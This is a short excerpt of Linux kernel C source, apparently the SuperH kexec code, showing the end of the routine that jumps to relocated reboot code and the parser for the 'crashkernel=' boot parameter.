vbr_reg = 0x80000000; // dummy
#endif
/* Interrupts aren't acceptable while we reboot */
local_irq_disable();
page_list = image->head;
/* we need both effective and real address here */
reboot_code_buffer =
(unsigned long)page_address(image->control_code_page);
/* copy our kernel relocation code to the control code page */
memcpy((void *)reboot_code_buffer, relocate_new_kernel,
relocate_new_kernel_size);
kexec_info(image);
flush_cache_all();
/* now call it */
rnk = (relocate_new_kernel_t) reboot_code_buffer;
(*rnk)(page_list, reboot_code_buffer, image->start, vbr_reg);
}
/* crashkernel=size@addr specifies the location to reserve for
* a crash kernel. By reserving this memory we guarantee
* that linux never sets it up as a DMA target.
* Useful for holding code to do something appropriate
* after a kernel panic.
*/
static int __init parse_crashkernel(char *arg)
{
unsigned long size, base;
size = memparse(arg, &arg);
if (*arg == '@') {
base = memparse(arg+1, &arg);
/* FIXME: Do I want a sanity check
* to validate the memory range?
*/
crashk_res.start = base;
crashk_res.end = base + size - 1;
}
return 0;
}
early_param("crashkernel", parse_crashkernel);
|
End of preview. Expand
in Dataset Viewer.
- Downloads last month
- 61